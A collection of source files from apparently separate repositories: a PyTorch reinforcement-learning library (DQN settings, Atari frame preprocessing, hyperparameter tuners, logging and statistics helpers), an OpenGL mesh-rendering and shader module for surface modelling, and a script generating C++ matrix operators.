cls.REPLAY_SIZE = 100000
cls.REPLAY_START_SIZE = 10000
cls.INITIAL_EXPLORATION = 1.0
cls.FINAL_EXPLORATION = 0.02
cls.FINAL_EXPLORATION_FRAME = 100000
# this corresponds to updating every 1000 frames
cls.TARGET_NETWORK_UPDATE_FREQ = 250
cls.OPTIMIZER = optim.Adam
cls.OPTIMIZER_KWARGS = {"lr": 1e-4}
else:
raise ValueError("Unsupported Hyper param mode")
@classmethod
def get_all_hyperparams(cls):
all_kwargs = {}
for k, v in cls.__dict__.items():
if not any([k.startswith("__"),
isinstance(v, classmethod)]):
all_kwargs[k] = v
return all_kwargs
```
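A sketch of how these class-level settings might be selected and inspected before training (usage inferred from the classmethods above):

```python
from rltorch.papers.DQN.hyperparams import AtariHyperparams as hp

hp.set_seed(42)
hp.set_mode("ddqn-tuned")  # switches ALGO and the tuned exploration/target values
for k, v in sorted(hp.get_all_hyperparams().items()):
    print(k, "=", v)
```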
#### File: papers/DQN/preprocess.py
```python
import time
import numpy as np
from PIL import Image
import multiprocessing as mp
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
class ImageProcessor:
def __init__(self, resized_height, resized_width):
self.resized_height = resized_height
self.resized_width = resized_width
def process_frames(self, f1, f2):
# 1. take maximum pixel values over two frames
max_frame = np.maximum(f1, f2)
# 2. resize image
img = Image.fromarray(max_frame)
img = img.resize((self.resized_width, self.resized_height))
# 3. convert image to grey scale
img = img.convert(mode="L")
x = np.asarray(img)
return x
def debug(self, f1, f2):
raw1 = Image.fromarray(f1)
raw2 = Image.fromarray(f2)
processed = self.process_frames(f1, f2)
processed = Image.fromarray(processed)
raw1.show("raw1")
raw2.show("raw2")
processed.show("processed")
def show_image(self, x, wait_for_user=True):
img = Image.fromarray(x)
img.show()
if wait_for_user:
input("Press any key..")
def show_stacked(self, x_stacked, wait_for_user=True):
for i in range(x_stacked.shape[0]):
self.show_image(x_stacked[i], False)
time.sleep(0.01)
if wait_for_user:
input("Press any key..")
class ImageHistory:
def __init__(self, history_length, img_dims):
self.length = history_length
self.img_dims = img_dims
self.history = np.empty((history_length, *img_dims), dtype=np.float32)
self.size, self.ptr = 0, 0
def push(self, x):
self.history[self.ptr] = x
self.ptr = (self.ptr + 1) % self.length
self.size = min(self.size+1, self.length)
def get(self):
assert self.size == self.length
# must add 1 for N dim for DQN
history_buffer = np.empty((1, self.length, *self.img_dims),
dtype=np.float32)
history_buffer[0][:self.length-self.ptr] = self.history[self.ptr:]
history_buffer[0][self.length-self.ptr:] = self.history[:self.ptr]
return history_buffer
def clear(self):
self.size, self.ptr = 0, 0
def run_animation(args):
"""To be run on seperate process """
img_queue, img_dims, img_min, img_max = args
fig = plt.figure()
    tmp_img = Image.fromarray(np.ones(img_dims))
    im = plt.imshow(tmp_img, cmap='gray', vmin=img_min, vmax=img_max)
def _anim_init():
im.set_data(tmp_img)
return [im]
def _anim_func(i):
while img_queue.empty():
time.sleep(0.1)
x = Image.fromarray(img_queue.get())
im.set_array(x)
img_queue.task_done()
return [im]
anim = FuncAnimation(fig,
_anim_func,
init_func=_anim_init,
interval=1,
blit=True)
plt.show()
class ImageAnimation:
def __init__(self, img_dims=(84, 84), img_min=0, img_max=255):
self.queue = mp.JoinableQueue()
self.anim_proc = None
self.img_dims = img_dims
self.img_min = img_min
self.img_max = img_max
def start(self):
args = (self.queue, self.img_dims, self.img_min, self.img_max)
self.anim_proc = mp.Process(target=run_animation,
args=(args,))
self.anim_proc.start()
def add_image(self, x):
self.queue.put(x)
def stop(self):
self.queue.join()
self.anim_proc.join()
```
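A minimal sketch of the frame pipeline above, using dummy Atari-sized frames: two raw frames are max-pooled, resized and greyscaled, four results fill the history, and `get()` returns a (1, 4, 84, 84) network input:

```python
import numpy as np

proc = ImageProcessor(84, 84)
history = ImageHistory(history_length=4, img_dims=(84, 84))

f1 = np.zeros((210, 160, 3), dtype=np.uint8)  # dummy raw frames for illustration
f2 = np.zeros((210, 160, 3), dtype=np.uint8)
for _ in range(4):
    history.push(proc.process_frames(f1, f2))

x = history.get()
assert x.shape == (1, 4, 84, 84)
```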
#### File: rltorch/tuner/random_tuner.py
```python
import random
import numpy as np
import multiprocessing as mp
from rltorch.tuner.tuner import Tuner
class RandomTuner(Tuner):
"""Takes an algorithm and lists of hyperparam values and runs
random hyperparameter search.
The tuner will run the specified number of experiments, selecting a
new random hyperparameter from the provided options each time.
"""
def __init__(self, num_exps, name='', seeds=[0]):
"""
Arguments
---------
num_exps : int
number of different experiment runs to conduct
"""
super().__init__(name, seeds)
self.num_exps = num_exps
def add_dist(self, key, dist, shorthand=None, default=None):
"""Add a new hyperparam with a callable distribution that can be used
to sample a value.
Arguments
---------
key : str
name of the hyperparameter (must match arg name in alg function)
dist : callable
distribution to sample from
shorthand : str, optional
optional shorthand name for hyperparam (if none, one is made
from first three letters of key)
default : varied, optional
optional default value to use for hyperparam. If not provided,
defaults to first value in vals list.
"""
assert callable(dist), \
"Dist must be callable. Use add method for lists of values"
if key == "seed":
print("Warning: Seeds already added to experiment so ignoring this"
" hyperparameter addition.")
return
self._check_key(key)
shorthand = self._handle_shorthand(key, shorthand)
self.keys.append(key)
self.vals.append(dist)
self.shs.append(shorthand)
self.default_vals.append(dist if default is None else default)
def _run(self, agent_cls, num_cpu):
""" Run each variant in the grid with algorithm """
# construct all variants at start since np.random.seed is set
# each time algo is run which messes with random sampling
variants = []
for i in range(self.num_exps):
var = self.sample_next_variant()
var_name = self.name_variant(var)
variants.append((i, var_name, var, agent_cls))
with mp.Pool(num_cpu) as p:
p.map(self._run_variant, variants)
def sample_next_variant(self):
"""Randomly samples next variant. """
variant = {}
for k, v in zip(self.keys, self.vals):
if callable(v):
sampled_val = v()
else:
sampled_val = random.choice(v)
variant[k] = sampled_val
return variant
def get_num_exps(self):
return self.num_exps
if __name__ == "__main__":
num_exps = 16
tuner = RandomTuner(num_exps, name="Test", seeds=5)
tuner.add("one", [1, 2])
tuner.add("two", [0.01, 0.0004])
tuner.add("three", [True, False])
tuner.add_dist("four", lambda: np.random.uniform(0, 1), "fr", 0.5)
tuner.add_dist("five", lambda: 10, "fv", 3)
tuner.print_info()
for i in range(num_exps):
var = tuner.sample_next_variant()
print(tuner.name_variant(var), ":", var)
```
#### File: rltorch/tuner/tuner.py
```python
import numpy as np
import os.path as osp
from prettytable import PrettyTable
LINE_WIDTH = 80
def call_experiment(agent_cls, exp_name, seed=0, **kwargs):
"""Run an algorithm with hyperparameters (kwargs), plus configuration
Arguments
---------
agent : Agent
callable algorithm function
exp_name : str
name for experiment
seed : int
random number generator seed
**kwargs : dict
all kwargs to pass to algo
"""
# in case seed not in passed kwargs dict
kwargs['seed'] = seed
kwargs["exp_name"] = exp_name
# print experiment details
table = PrettyTable()
print("\nRunning experiment: {}".format(exp_name))
table.field_names = ["Hyperparameter", "Value"]
for k, v in kwargs.items():
table.add_row([k, v])
print("\n", table, "\n")
agent = agent_cls(**kwargs)
agent.train()
class Tuner:
"""Abstract base class for specific hyperparam search algorithms
Subclasses must implement:
- _run
"""
line = "\n" + "-"*LINE_WIDTH + "\n"
thick_line = "\n" + "="*LINE_WIDTH + "\n"
def __init__(self, name='', seeds=[0]):
"""
Arguments
---------
name : str
name for the experiment. This is used when naming files
seeds : int or list
the seeds to use for runs.
If it is a scalar this is taken to be the number of runs and
so will use all seeds up to scalar
"""
assert isinstance(name, str), "Name has to be string"
assert isinstance(seeds, (list, int)), \
"Seeds must be a int or list of ints"
self.name = name
self.keys = []
self.vals = []
self.default_vals = []
self.shs = []
if isinstance(seeds, int):
self.seeds = list(range(seeds))
else:
self.seeds = seeds
def run(self, agent_cls, num_cpu=1):
"""Run the tuner.
Note assumes:
1. environment is also passed by user as a hyperparam
Arguments
---------
agent_cls : Class
the agent class to run
num_cpu : int
number of cpus to use
"""
self.print_info()
self._run(agent_cls, num_cpu)
def _run(self, agent_cls, num_cpu=1):
raise NotImplementedError
def add(self, key, vals, shorthand=None, default=None):
"""Add a new hyperparam with given values and optional shorthand name
Arguments
---------
key : str
name of the hyperparameter (must match arg name in alg function)
vals : list
values for hyperparameter
shorthand : str, optional
optional shorthand name for hyperparam (if none, one is made
from first three letters of key)
default : variable, optional
optional default value to use for hyperparam. If not
provided, defaults to first value in vals list.
"""
if key == "seed":
print("Warning: Seeds already added to experiment so ignoring "
"this hyperparameter addition.")
return
self._check_key(key)
shorthand = self._handle_shorthand(key, shorthand)
if not isinstance(vals, list):
vals = [vals]
self.keys.append(key)
self.vals.append(vals)
self.shs.append(shorthand)
self.default_vals.append(vals[0] if default is None else default)
def _check_key(self, key):
"""Checks key is valid. """
assert isinstance(key, str), "Key must be a string."
        assert key[0].isalnum(), "First letter of key must be alphanumeric."
def _handle_shorthand(self, key, shorthand):
"""Handles the creation of shorthands """
assert shorthand is None or isinstance(shorthand, str), \
"Shorthand must be None or string."
if shorthand is None:
shorthand = "".join(ch for ch in key[:3] if ch.isalnum())
assert shorthand[0].isalnum(), \
"Shorthand must start with at least one alphanumeric letter."
return shorthand
def print_info(self):
"""Prints a message containing details of tuner (i.e. current
hyperparameters and their values)
"""
print(self.thick_line)
print(f"{self.__class__.__name__} Info:")
table = PrettyTable()
table.title = f"Tuner - {self.name}"
headers = ["key", "values", "shorthand", "default"]
table.field_names = headers
data = zip(self.keys, self.vals, self.shs, self.default_vals)
for k, v, s, d in data:
v_print = 'dist' if callable(v) else v
d_print = 'dist' if callable(d) else d
table.add_row([k, v_print, s, d_print])
num_exps = self.get_num_exps()
print("\n", table, "\n")
print(f"Seeds: {self.seeds}")
print(f"Total number of variants, ignoring seeds: {num_exps}")
print("Total number of variants, including seeds: "
f"{num_exps * len(self.seeds)}")
print(self.thick_line)
def get_num_exps(self):
"""Returns total number of experiments, not including seeds, that
will be run
"""
return int(np.prod([len(v) for v in self.vals]))
def print_results(self, results):
"""Prints results in a nice table
Arguments
---------
results : list
variant experiment result dicts
"""
table = PrettyTable()
table.title = "Final results for all experiments"
any_res = results[0]
headers = list(any_res.keys())
table.field_names = headers
for var_result in results:
row = []
for k in headers:
row.append(var_result[k])
table.add_row(row)
print("\n{table}\n")
def write_results(self, results, data_dir):
"""Writes results to file
Arguments
---------
results : list
list of variant experiment result dicts
data_dir : str
directory to store data, if None uses current working directory
"""
output_fname = self.name + "_results.txt"
if data_dir is not None:
output_fname = osp.join(data_dir, output_fname)
headers = list(results[0].keys())
header_row = "\t".join(headers) + "\n"
with open(output_fname, "w") as fout:
fout.write(header_row)
for var_result in results:
row = []
for k in headers:
v = var_result[k]
vstr = "%.3g" % v if isinstance(v, float) else str(v)
row.append(vstr)
fout.write("\t".join(row) + "\n")
def name_variant(self, variant):
"""Get the name of variant, where the names is the HPGridTuner
name followed by shorthand of each hyperparam and value, all
seperated by underscores
e.g.
gridName_h1_v1_h2_v2_h3_v3 ...
Except:
1. does not include hyperparams with only a single value
2. does not include seed
3. if value is bool only include hyperparam name if val is true
"""
var_name = self.name
for k, v, sh in zip(self.keys, self.vals, self.shs):
if k != 'seed' and (callable(v) or len(v) > 1):
variant_val = variant[k]
if not callable(v) and \
all([isinstance(val, bool) for val in v]):
var_name += ("_" + sh) if variant_val else ''
elif callable(v):
if isinstance(variant_val, float):
val_format = "{:.3f}".format(variant_val)
else:
val_format = str(variant_val)
var_name += ("_" + sh + "_" + str(val_format))
else:
var_name += ("_" + sh + "_" + str(variant_val))
return var_name
def _run_variant(self, args):
"""Runs a single hyperparameter setting variant with algo for each
seed.
"""
exp_num, exp_name, variant, agent_cls = args
print(f"{self.thick_line}\n{self.name} experiment "
f"{exp_num} of {self.num_exps}")
trial_num = 1
trial_results = []
for seed in self.seeds:
print(f"{self.line}\n>>> Running trial {trial_num} of"
f" {len(self.seeds)}")
variant["seed"] = seed
var_result = call_experiment(agent_cls,
exp_name,
**variant)
trial_results.append(var_result)
trial_num += 1
print(self.line)
print(f"{exp_name} experiment complete")
print(self.thick_line)
def sort_results(self, results, metric):
"""Sorts results by a given metric """
sorted_results = sorted(results, key=lambda k: k[metric], reverse=True)
return sorted_results
```
#### File: rltorch/utils/rl_logger.py
```python
import time
import os.path as osp
from prettytable import PrettyTable
import rltorch.utils.file_utils as fu
from rltorch.user_config import DEFAULT_DATA_DIR
RESULTS_FILE_NAME = "results"
RESULTS_FILE_EXT = "tsv"
CONFIG_FILE_NAME = "config"
CONFIG_FILE_EXT = "yaml"
CONFIG_FILE = f"{CONFIG_FILE_NAME}.{CONFIG_FILE_EXT}"
RESULTS_FILE = f"{RESULTS_FILE_NAME}.{RESULTS_FILE_EXT}"
def get_exp_name(env_name, alg):
ts = time.strftime("%Y%m%d-%H%M%S")
return f"{alg}_{env_name}_{ts}"
class RLLogger:
def __init__(self, env_name, alg=None, parent_dir=None):
self.env_name = env_name
self.alg = alg
self.parent_dir = parent_dir
self.setup_save_file()
self.headers = []
self.log_buffer = dict()
self.headers_written = False
def setup_save_file(self):
        exp_name = get_exp_name(self.env_name, self.alg)
if self.parent_dir:
parent_dir = osp.join(DEFAULT_DATA_DIR, self.parent_dir)
fu.make_dir(parent_dir)
else:
parent_dir = DEFAULT_DATA_DIR
self.save_dir = osp.join(parent_dir, exp_name)
fu.make_dir(self.save_dir)
self.save_file_path = fu.generate_file_path(self.save_dir,
RESULTS_FILE_NAME,
RESULTS_FILE_EXT)
def get_save_path(self, filename=None, ext=None):
if filename is None:
filename = get_exp_name(self.env_name, self.alg)
return fu.generate_file_path(self.save_dir, filename, ext)
def save_config(self, cfg):
cfg_file = self.get_save_path(CONFIG_FILE_NAME, CONFIG_FILE_EXT)
fu.write_yaml(cfg_file, cfg)
def add_header(self, header):
assert header not in self.headers
self.headers.append(header)
def log(self, header, value):
if not self.headers_written and header not in self.headers:
self.headers.append(header)
else:
assert header in self.headers, \
"Cannot log value of new header, use add_header first."
self.log_buffer[header] = value
def flush(self, display=False):
if display:
self.display()
save_file = open(self.save_file_path, "a+")
if not self.headers_written:
save_file.write("\t".join(self.headers) + "\n")
self.headers_written = True
row = []
for header in self.headers:
row.append(str(self.log_buffer[header]))
save_file.write("\t".join(row) + "\n")
save_file.close()
def display(self):
table = PrettyTable()
        table.field_names = ["Metric", "Value"]
for header in self.headers:
val = self.log_buffer[header]
val = f"{val:.6f}" if isinstance(val, float) else str(val)
table.add_row([header, val])
print()
print(table)
print()
```
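A usage sketch for the logger (env and metric names assumed for illustration): log the same headers every epoch, then flush to append one tab-separated row:

```python
logger = RLLogger("CartPole-v1", alg="DQN")
logger.save_config({"lr": 0.001, "seed": 0})

for epoch in range(3):
    logger.log("epoch", epoch)
    logger.log("avg_return", 100.0 + epoch)
    logger.flush(display=True)  # writes the header row once, then one row per flush
```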
#### File: rltorch/utils/stat_utils.py
```python
import math
import numpy as np
class StatTracker:
"""A class for tracking the running mean and variance.
Uses the Welford algorithm for running means, var and stdev:
https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance
Also tracks the moving mean, var and stdev over a specific window
size (default=100)
"""
def __init__(self, window=100):
self.window = window
self.ptr = 0
self.value_buffer = np.zeros(window, dtype=np.float32)
self.min_val = math.inf
self.max_val = -math.inf
self.total = 0
self.mean = 0
self.M2 = 0
self.n = 0
def update(self, x):
# handle total running values
self.min_val = min(self.min_val, x)
self.max_val = max(self.max_val, x)
self.total += x
self.n += 1
delta = x - self.mean
self.mean += delta / self.n
delta2 = x - self.mean
self.M2 += delta * delta2
# handle moving values
self.value_buffer[self.ptr] = x
self.ptr = (self.ptr+1) % self.window
@property
def var(self):
if self.n <= 1:
return 0
return self.M2 / self.n
@property
def stdev(self):
return math.sqrt(self.var)
@property
def moving_mean(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].mean()
return self.value_buffer.mean()
@property
def moving_var(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].var()
return self.value_buffer.var()
@property
def moving_stdev(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].std()
return self.value_buffer.std()
@property
def moving_max(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].max()
return self.value_buffer.max()
@property
def moving_min(self):
if self.n < self.window:
return self.value_buffer[:self.ptr].min()
return self.value_buffer.min()
``` |
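A worked example of the Welford updates above: after seeing 1, 2, 3 the running mean is 2.0 and M2 accumulates to 2.0, so the population variance is M2 / n = 2/3:

```python
st = StatTracker(window=100)
for x in [1.0, 2.0, 3.0]:
    st.update(x)

assert st.mean == 2.0                    # running mean
assert abs(st.var - 2.0 / 3.0) < 1e-12   # population variance M2 / n
assert (st.min_val, st.max_val) == (1.0, 3.0)
```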
{
"source": "JJscott/ARAP_Surface_Modelling",
"score": 2
} |
#### File: JJscott/ARAP_Surface_Modelling/geometry.py
```python
import pygloo
from pygloo import *
from ctypes import *
from simpleShader import makeProgram
# Math
#
from math import *
import random
import numpy as np
def _flatten_list(l):
return [e for row in l for e in row]
class Geometry(object):
solid_shader = GLuint(0)
wire_shader = GLuint(0)
flat_shader = GLuint(0)
def __init__(self, gl, v=[], vtf=[], f=[]):
if not Geometry.solid_shader:
Geometry.solid_shader = makeProgram(gl, "330 core", [GL_VERTEX_SHADER, GL_GEOMETRY_SHADER, GL_FRAGMENT_SHADER],
open("shaders/solid_shader.glsl").read())
if not Geometry.wire_shader:
Geometry.wire_shader = makeProgram(gl, "330 core", [GL_VERTEX_SHADER, GL_GEOMETRY_SHADER, GL_FRAGMENT_SHADER],
open("shaders/wireframe_shader.glsl").read())
if not Geometry.flat_shader:
Geometry.flat_shader = makeProgram(gl, "330 core", [GL_VERTEX_SHADER, GL_FRAGMENT_SHADER],
open("shaders/flat_color_shader.glsl").read())
self.verts = v
self.vertToFaces = vtf
self.faces = f
self.selected = []
self.constrained = []
# Creating the VAO and VBO(s) for mesh
#
self.vao = GLuint(0)
gl.glGenVertexArrays(1, self.vao)
gl.glBindVertexArray(self.vao)
# Index IBO
idx_array = pygloo.c_array(GLuint, _flatten_list(self.faces))
self.ibo = GLuint(0)
self.ibo_size = len(idx_array)
gl.glGenBuffers(1, self.ibo)
gl.glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ibo);
gl.glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(idx_array), idx_array, GL_STATIC_DRAW);
# Vertex Position VBO
self.vbo_pos = GLuint(0)
gl.glGenBuffers(1, self.vbo_pos)
gl.glBindVertexArray(0)
# Creating the VAO(s) for selected/constrained points
#
# Selected
self.vao_selected = GLuint(0)
gl.glGenVertexArrays(1, self.vao_selected)
gl.glBindVertexArray(self.vao_selected)
self.ibo_selected = GLuint(0)
gl.glGenBuffers(1, self.ibo_selected)
# Constrained
self.vao_constrained = GLuint(0)
gl.glGenVertexArrays(1, self.vao_constrained)
gl.glBindVertexArray(self.vao_constrained)
self.ibo_constrained = GLuint(0)
gl.glGenBuffers(1, self.ibo_constrained)
# Make the update
self.update(gl)
    # Because we are going to be changing the positions of the vertices a lot,
# as well as the selected/constrained points, this is a helper method that
# is run occasionally
def update(self, gl):
# Update vertex position information
#
gl.glBindVertexArray(self.vao)
# Vertex Position VBO (pos 0)
pos_array = pygloo.c_array(GLfloat, _flatten_list(self.verts))
gl.glBindBuffer(GL_ARRAY_BUFFER, self.vbo_pos)
gl.glBufferData(GL_ARRAY_BUFFER, sizeof(pos_array), pos_array, GL_STREAM_DRAW)
gl.glEnableVertexAttribArray(0)
gl.glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0)
# Update Selected/Constrained information
#
gl.glBindVertexArray(self.vao_selected)
idx_array = pygloo.c_array(GLuint, self.selected)
gl.glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ibo_selected);
gl.glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(idx_array), idx_array, GL_STREAM_DRAW);
gl.glBindBuffer(GL_ARRAY_BUFFER, self.vbo_pos)
gl.glEnableVertexAttribArray(0)
gl.glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0)
gl.glBindVertexArray(self.vao_constrained)
idx_array = pygloo.c_array(GLuint, self.constrained)
gl.glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ibo_constrained);
gl.glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(idx_array), idx_array, GL_STREAM_DRAW);
gl.glBindBuffer(GL_ARRAY_BUFFER, self.vbo_pos)
gl.glEnableVertexAttribArray(0)
gl.glVertexAttribPointer(0, 3, GL_FLOAT, GL_FALSE, 0, 0)
# Cleanup
gl.glBindVertexArray(0)
def render(self, gl, mv, proj, wireframe=False):
# Render Model
#
gl.glUseProgram(Geometry.solid_shader)
gl.glBindVertexArray(self.vao)
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.solid_shader, "modelViewMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(mv)))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.solid_shader, "projectionMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(proj)))
gl.glDrawElements(GL_TRIANGLES, self.ibo_size, GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(0)
if wireframe:
# Render
#
gl.glEnable(GL_LINE_SMOOTH)
gl.glUseProgram(Geometry.wire_shader)
gl.glBindVertexArray(self.vao)
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.wire_shader, "modelViewMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(mv)))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.wire_shader, "projectionMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(proj)))
gl.glDrawElements(GL_TRIANGLES, self.ibo_size, GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(0)
# Render selected and constrained points
#
gl.glPointSize(5.0)
gl.glUseProgram(Geometry.flat_shader)
gl.glBindVertexArray(self.vao_selected)
gl.glUniform3fv(gl.glGetUniformLocation(Geometry.flat_shader, "color"), 1, pygloo.c_array(GLfloat, [1.0, 1.0, 0.0]))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.flat_shader, "modelViewMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(mv)))
gl.glUniformMatrix4fv(gl.glGetUniformLocation(Geometry.flat_shader, "projectionMatrix"), 1, True, pygloo.c_array(GLfloat, _flatten_list(proj)))
gl.glDrawElements(GL_POINTS, len(self.selected), GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(self.vao_constrained)
gl.glUniform3fv(gl.glGetUniformLocation(Geometry.flat_shader, "color"), 1, pygloo.c_array(GLfloat, [1.0, 0.0, 0.0]))
gl.glDrawElements(GL_POINTS, len(self.constrained), GL_UNSIGNED_INT, 0)
gl.glBindVertexArray(0)
@staticmethod
def from_OBJ(gl, s):
verts = []
vertToFaces = []
faces = []
for line in open(s, "r"):
vals = line.split()
if len(vals) > 0:
if vals[0] == "v":
v = map(float, vals[1:4])
verts.append(v)
vertToFaces.append([])
elif vals[0] == "f":
f = map(lambda x : int(x.split("/")[0])-1, vals[1:4])
map(lambda x : vertToFaces[x].append(len(faces)), f)
faces.append(f)
return Geometry(gl, verts, vertToFaces, faces)
class mat4:
@staticmethod
def identity():
return np.asarray([
[1, 0, 0, 0,],
[0, 1, 0, 0,],
[0, 0, 1, 0,],
[0, 0, 0, 1]])
@staticmethod
def translate(tx, ty, tz):
return np.asarray([
[1, 0, 0, tx,],
[0, 1, 0, ty,],
[0, 0, 1, tz,],
[0, 0, 0, 1]])
@staticmethod
def scale(sx, sy, sz):
return np.asarray([
[sx, 0, 0, 0,],
[0, sy, 0, 0,],
[0, 0, sz, 0,],
[0, 0, 0, 1]])
@staticmethod
def rotateX(a):
return np.asarray([
[1, 0, 0, 0,],
[0, cos(a), -sin(a),0,],
[0, sin(a), cos(a), 0,],
[0, 0, 0, 1]])
@staticmethod
def rotateY(a):
return np.asarray([
[cos(a),0, sin(a), 0,],
[0, 1, 0, 0,],
[-sin(a),0, cos(a), 0,],
[0, 0, 0, 1]])
@staticmethod
def rotateZ(a):
return np.asarray([
[cos(a), -sin(a),0, 0,],
[sin(a), cos(a), 0, 0,],
[0, 0, 1, 0,],
[0, 0, 0, 1]])
@staticmethod
def perspectiveProjection(fovy, aspect, zNear, zFar):
f = cos(fovy / 2) / sin(fovy / 2);
return np.asarray([
[f / aspect,0, 0, 0,],
[0, f, 0, 0,],
[0, 0, (zFar + zNear) / (zNear - zFar), (2 * zFar * zNear) / (zNear - zFar),],
[0, 0, -1, 0]])
```
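A sketch of composing the mat4 helpers above into a model-view matrix (values assumed for illustration; these are row-major 4x4 arrays, which is why the render code uploads them with transpose set to True):

```python
import math
import numpy as np

proj = mat4.perspectiveProjection(math.pi / 3, 16.0 / 9.0, 0.1, 100.0)
mv = np.dot(mat4.translate(0, 0, -5), mat4.rotateY(0.5))
p = np.dot(mv, np.asarray([1.0, 0.0, 0.0, 1.0]))  # transform a homogeneous point
```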
#### File: JJscott/ARAP_Surface_Modelling/simpleShader.py
```python
import pygloo
from pygloo import *
from ctypes import *
'''
Usage example:
prog = makeProgram(gl, '330 compatibility', [GL_VERTEX_SHADER, GL_GEOMETRY_SHADER, GL_FRAGMENT_SHADER], shader_source)
'''
class ShaderError(Exception):
def __init__(self, msg = 'Generic shader error'):
Exception.__init__(self, msg)
# }
# }
class ShaderCompileError(ShaderError):
def __init__(self, msg = 'Shader compilation failed'):
ShaderError.__init__(self, msg)
# }
# }
class ShaderLinkError(ShaderError):
def __init__(self, msg = 'Shader program linking failed'):
ShaderError.__init__(self, msg)
# }
# }
def printShaderInfoLog(gl, obj):
loglen = GLint(0)
gl.glGetShaderiv(obj, GL_INFO_LOG_LENGTH, loglen)
if loglen > 1:
log = create_string_buffer(loglen.value)
loglen2 = GLint(0)
gl.glGetShaderInfoLog(obj, loglen, loglen2, log)
print 'Shader:\n', log.value
# }
# }
def printProgramInfoLog(gl, obj):
loglen = GLint(0)
gl.glGetProgramiv(obj, GL_INFO_LOG_LENGTH, loglen)
if loglen > 1:
log = create_string_buffer(loglen.value)
loglen2 = GLint(0)
gl.glGetProgramInfoLog(obj, loglen, loglen2, log)
print 'Program:\n', log.value
# }
# }
def compileShader(gl, stype, text):
shader = gl.glCreateShader(stype)
text = create_string_buffer(text)
ptext = cast(pointer(text), POINTER(c_char))
gl.glShaderSource(shader, 1, pointer(ptext), POINTER(GLint)())
try:
gl.glCompileShader(shader)
except GLError:
pass
# }
compile_status = GLint(0)
gl.glGetShaderiv(shader, GL_COMPILE_STATUS, compile_status)
printShaderInfoLog(gl, shader)
if not compile_status.value:
raise ShaderCompileError()
# }
return shader
# }
def linkProgram(gl, prog):
try:
gl.glLinkProgram(prog)
except GLError:
pass
# }
link_status = GLint(0)
gl.glGetProgramiv(prog, GL_LINK_STATUS, link_status)
printProgramInfoLog(gl, prog)
if not link_status.value:
raise ShaderLinkError()
# }
# }
def makeProgram(gl, profile, stypes, source):
prog = gl.glCreateProgram()
defines = dict({
(GL_VERTEX_SHADER, '_VERTEX_'),
(GL_GEOMETRY_SHADER, '_GEOMETRY_'),
(GL_TESS_CONTROL_SHADER, '_TESS_CONTROL_'),
(GL_TESS_EVALUATION_SHADER, '_TESS_EVALUATION_'),
(GL_FRAGMENT_SHADER, '_FRAGMENT_')
})
for stype in stypes:
text = '#version {profile}\n#define {sdef}\n{source}'.format(profile=profile, sdef=defines[stype], source=source)
shader = compileShader(gl, stype, text)
gl.glAttachShader(prog, shader)
# }
linkProgram(gl, prog)
print 'Shader program compiled and linked successfully'
return prog
# }
``` |
{
"source": "JJscott/single_header_math",
"score": 2
} |
#### File: single_header_math/scripts/matops.py
```python
assign_ops = [
('+=', 'add_assign', None),
('-=', 'sub_assign', None),
('*=', 'mul_assign', None),
('/=', 'div_assign', None)
]
unary_ops = [
('-', 'neg', 'negate')
]
binary_ops = [
('+', 'add', None),
('-', 'sub', None),
('*', 'mul', None),
('/', 'div', None)
]
assign_op_str = '''// mat {comment}
template <typename MatT1, typename MatT2, enable_if_matrix_compatible_t<MatT1, MatT2> = 0>
inline MatT1 & operator{op}(MatT1 &lhs, const MatT2 &rhs) {{
zip_with(detail::op::{func}(), lhs, rhs);
return lhs;
}}
// mat {comment} scalar
template <typename MatT, typename T, enable_if_matrix_scalar_compatible_t<MatT, T> = 0>
inline MatT & operator{op}(MatT &lhs, const T &rhs) {{
zip_with(detail::op::{func}(), lhs, repeat_vec_vec<T, mat_cols<MatT>::value, mat_rows<MatT>::value>(rhs));
return lhs;
}}
'''
unary_op_str= '''// mat {comment}
template <typename MatT, enable_if_matrix_t<MatT> = 0>
inline auto operator{op}(const MatT &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), rhs);
}}
'''
binary_op_str = '''// mat {comment}
template <typename MatT1, typename MatT2, enable_if_matrix_compatible_t<MatT1, MatT2> = 0>
inline auto operator{op}(const MatT1 &lhs, const MatT2 &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), lhs, rhs);
}}
// mat {comment} right scalar
template <typename MatT, typename T, enable_if_matrix_scalar_compatible_t<MatT, T> = 0>
inline auto operator{op}(const MatT &lhs, const T &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), lhs, repeat_vec_vec<T, mat_cols<MatT>::value, mat_rows<MatT>::value>(rhs));
}}
// mat {comment} left scalar
template <typename MatT, typename T, enable_if_matrix_scalar_compatible_t<MatT, T> = 0>
inline auto operator{op}(const T &lhs, const MatT &rhs) {{
return zip_with<type_to_mat>(detail::op::{func}(), repeat_vec_vec<T, mat_cols<MatT>::value, mat_rows<MatT>::value>(lhs), rhs);
}}
'''
def main():
for op, func, comment in assign_ops:
print assign_op_str.format(op=op, func=func, comment = comment if comment is not None else func)
# }
for op, func, comment in unary_ops:
print unary_op_str.format(op=op, func=func, comment = comment if comment is not None else func)
# }
